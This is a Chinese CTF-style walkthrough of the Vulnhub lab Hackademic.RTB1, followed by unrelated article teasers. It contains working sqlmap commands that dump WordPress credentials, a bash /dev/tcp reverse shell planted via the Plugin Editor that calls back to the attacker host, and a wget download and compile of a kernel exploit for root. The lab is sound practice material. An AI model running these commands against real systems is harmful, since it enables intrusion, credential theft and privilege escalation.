Vulnhub系列靶机-Hackadmeic.RTB1

文章目录

  • Vulnhub系列靶机-Hackadmeic.RTB1
    • 1. 信息收集
      • 1.1 主机扫描
      • 1.2 端口扫描
      • 1.3 目录爆破
    • 2. 漏洞探测
    • 3. 漏洞利用
      • 3.1 反弹Shell
    • 4. 内核提权

Vulnhub系列靶机-Hackadmeic.RTB1

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230910123002137

1.2 端口扫描

nmap -A -p- 192.168.188.184

image-20230910123759565

扫描到了22端口和80端口,但是22端口的关闭的。

访问Web页面。

image-20230910123616182

使用浏览器插件Wappalyzer扫描网站

image-20230910123707794

看到WordPress,数据库是MySQL,语言是PHP。

根据首页中显示的内容,点击target

image-20230910124238518

页面提示告诉我们要读取root目录下的Key.txt文件。

image-20230910124307870

1.3 目录爆破

爆破/Hackademic_RTB1/网页目录

dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200

image-20230910124525063

观察发现有一个登录页面wp-login.php。

2. 漏洞探测

在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

http://192.168.188.184/Hackademic_RTB1/?cat=1

image-20230910124640071

尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

image-20230910124747474

3. 漏洞利用

使用SqlMap工具进行SQL注入。

查看数据库

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230910125123842

查看数据库中有哪些表

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch

image-20230910125306585

查看wp_users表中字段

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch

image-20230910125441481

这里我们只关注user_login和user_pass字段。

获取字段信息

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch

image-20230910125648902

这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

image-20230910130217124

发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

3.1 反弹Shell

system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");

image-20230910132406678

kali中开启监听

nc -lnvp 8888

image-20230910130517734

提交之后,需要获取到上传的路径,才可以触发反弹shell。

之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

image-20230910130850517

刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

image-20230910131104899

点击hello.php后触发反弹shell

image-20230910132519556

4. 内核提权

查看内核版本

uname -a

image-20230910132621342

搜索系统内核版本漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230910132944564

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230910133028252

/usr/share/exploitdb/exploits/linux/local/15285.c

将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

python3 -m http.server 9999

image-20230910133601577

然后切换到tmp目录,执行wget命令下载该工具

wget http://192.168.188.157:9999/15285.c

image-20230910133819689

然后赋予该文件可执行权限

chmod 777 15285.c

image-20230910134031572

将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

image-20230910134327352

执行exp文件

image-20230910134416263

查看key.txt文件。

image-20230910134545165

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/135670.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

7.代理模式

1.UML 2.代码 #include <iostream> using namespace std;class Subject{ public:virtual void Request() 0; };class RealSubject:public Subject { public:virtual void Request(){cout << "RealSubject" << endl;} }; class Proxy:public Subj…

前端项目开发流程

一 参加需求对称(评审)会议 时间&#xff1a;在产品设计完成以后&#xff0c;进入正式的开发流程之前 组织者&#xff1a;产品&项目经理 目的&#xff1a;统一大家对产品的认识&#xff0c;及时发现产品设计缺陷&#xff0c;尽可能降低后续修改需求的频率 参与者&#xff…

Qt扩展-KDDockWidgets 简介及配置

Qt扩展-KDDockWidgets 简介及配置] 一、概述二、编译 KDDockWidgets 库1. Cmake Gui 中选择源文件和编译后的路径2. 点击Config&#xff0c;配置好编译器3. 点击Generate4. 在存放编译的文件夹输入如下命令开始编译 三、qmake 配置 一、概述 kdockwidgets是一个由KDAB组织编写…

C【操作符】

1. 操作符分类&#xff1a; 2. 算术操作符 int main() {double a 5 % 2;//商2余1printf("a %lf\n", a);return 0; } 3. 移位操作符 3.1 左移操作符 左边抛弃、右边补0 3.2 右移操作符 首先右移运算分两种&#xff1a; 1. 逻辑移位 左边用0填充&#xff0c;右边丢…

default 和 delete 与默认构造函数 的使用

前言 使用default和delete关键字来干预编译器自动生成的函数。让我详细解释一下这些知识点&#xff1a; 正文 编译器生成的默认构造函数&#xff1a; 如果类A没有定义任何构造函数&#xff0c;那么编译器会自动生成一个无参的默认构造函数 A()。这个默认构造函数实际上是一个…

23062QTday2

完善登录框 点击登录按钮后&#xff0c;判断账号&#xff08;admin&#xff09;和密码&#xff08;123456&#xff09;是否一致&#xff0c;如果匹配失败&#xff0c;则弹出错误对话框&#xff0c;文本内容“账号密码不匹配&#xff0c;是否重新登录”&#xff0c;给定两个按钮…

Word 文档转换 PDF、图片

工作有需要 Word 文档转换 PDF、图片 的场景&#xff0c;我们来看看 Java 开发中怎么解决这个问题的。 Word 转 PDF Word 转 PDF 分为商用 Aspose 方案和开源 Apache POIiText 方案。 Aspose 方案 这种方式在目前来看应该是最好的&#xff0c;无论是转换的速度还是成功的概…

速卖通API接口开发系列:帮助您提高运营效率!

您是否在寻找一种方法&#xff0c;让您的电商业务更高效&#xff0c;更具竞争力&#xff1f;我们有一个好消息要告诉您&#xff1a;速卖通&#xff0c;全球领先的电商平台&#xff0c;现在提供强大的API接口&#xff0c;让您可以轻松获取商品信息&#xff0c;处理订单&#xff…

Databend 开源周报第 111 期

Databend 是一款现代云数仓。专为弹性和高效设计&#xff0c;为您的大规模分析需求保驾护航。自由且开源。即刻体验云服务&#xff1a;https://app.databend.cn 。 Whats On In Databend 探索 Databend 本周新进展&#xff0c;遇到更贴近你心意的 Databend 。 理解 SHARE END…

【ArcSWAT】SWAT-CUP安装出错,提示加载类型库/DLL时出错

说明 SWAT-CUP早期版本不需要许可&#xff0c;可以在SWAT官网下载&#xff1a;点击下载swat_cup_setup_august2017_5162 最新版SWAT-CUP 2019需要再CUP官网下载&#xff0c;Swat-Cup&#xff0c;必须购买激活许可证才能获得此软件的全部功能。 我在win11上安装SWAT-CUP 2017版…

【力扣-每日一题】337. 打家劫舍 III

class Solution { public:pair<int,int> dfs_rob(TreeNode *root){//如果为根节点if(rootnullptr)return {0,0};auto [l,l_n]dfs_rob(root->left);auto [r,r_n]dfs_rob(root->right);int ol_nr_nroot->val;//当前节点偷&#xff0c;所获得的利益,子节点不能偷in…

Pytorch Advanced(二) Variational Auto-Encoder

自编码说白了就是一个特征提取器&#xff0c;也可以看作是一个降维器。下面找了一张很丑的图来说明自编码的过程。 自编码分为压缩和解码两个过程。从图中可以看出来&#xff0c;压缩过程就是将一组数据特征进行提取&#xff0c; 得到更深层次的特征。解码的过程就是利用之前的…

【Unity】ShaderGraph应用(浮动气泡)

【Unity】ShaderGraph应用(浮动气泡) 实现效果 一、实现的方法 1.使用节点介绍 Position&#xff1a;获取模型的顶点坐标 Simple Noise:简单的噪声&#xff0c;用于计算顶点抖动 Fresnel Effect&#xff1a;菲涅耳效应&#xff0c;用于实现气泡效果 计算用节点 Add&…

小程序键盘没有【小数点】输入

<input v-model"formData.number" :auto-height"true" placeholder"请输入" confirm-type"done" type"digit" maxlength"11" input"inputNumber" />number&#xff1a;数字键盘&#xff08;没有小…

【kafka】mac环境安装kafka

生产中使用到的中间件使用心得记录&#xff0c;感兴趣可以关注我一起学习&#xff5e; 环境&#xff1a; 硬件&#xff1a;mac 软件&#xff1a;kafka v3.0.0 安装步骤&#xff1a; 终端安装&#xff1a; 通过brew安装&#xff0c;会默认直接安装最新的版本 步骤1&#xf…

华为云云耀云服务器L实例评测|用Python的Flask框架加Nginx实现一个通用的爬虫项目

&#x1f3c6;作者简介&#xff0c;黑夜开发者&#xff0c;CSDN领军人物&#xff0c;全栈领域优质创作者✌&#xff0c;CSDN博客专家&#xff0c;阿里云社区专家博主&#xff0c;2023年6月CSDN上海赛道top4。 &#x1f3c6;数年电商行业从业经验&#xff0c;AWS/阿里云资深使用…

计算机专业毕业设计项目推荐06-工作室管理系统(Java+Vue+Mysql)

工作室管理系统&#xff08;JavaSpringVueMysql&#xff09; **介绍****系统总体开发情况-功能模块****各部分模块实现****最后想说的****联系方式** 介绍 本系列(后期可能博主会统一为专栏)博文献给即将毕业的计算机专业同学们,因为博主自身本科和硕士也是科班出生,所以也比较…

FPGA----VCU128的DDR4无法使用问题(全网唯一)

1、在Vivado 2019.1版本中使用DDR4的IP核会遇到如下图所示的错误&#xff0c;即便过了implementation生成了bit&#xff0c;DDR4也无法正常启动。 2、解决办法&#xff0c;上xilinx社区搜一下就知道了 AMD Customer Communityhttps://support.xilinx.com/s/article/69035?lan…

(JavaEE) 多线程基础3——多线程的代码案例 (单例模式, 阻塞队列,定时器)详解!!!

​​​​​​​ 目录 单例模式 什么是单例模式&#xff1f; —— “饿汉模式” —— “懒汉模式” ——懒汉模式-多线程版 ——懒汉模式-多线程版&#xff08;改进版&#xff09; 总结“懒汉模式”—— 多线程&#xff08;线程安全版&#xff09; 的要点 阻塞队列 什么…

K8s(Kubernetes)学习(六)——Ingress

第六章 Ingress 什么是 IngressIngress 和 Service 区别Ingress 控制器 Traefik 使用Ingress Route的定义 1 简介 https://kubernetes.io/zh-cn/docs/concepts/services-networking/ingress/ Ingress 是一种 Kubernetes 资源类型&#xff0c;它允许在 Kubernetes 集群中暴露…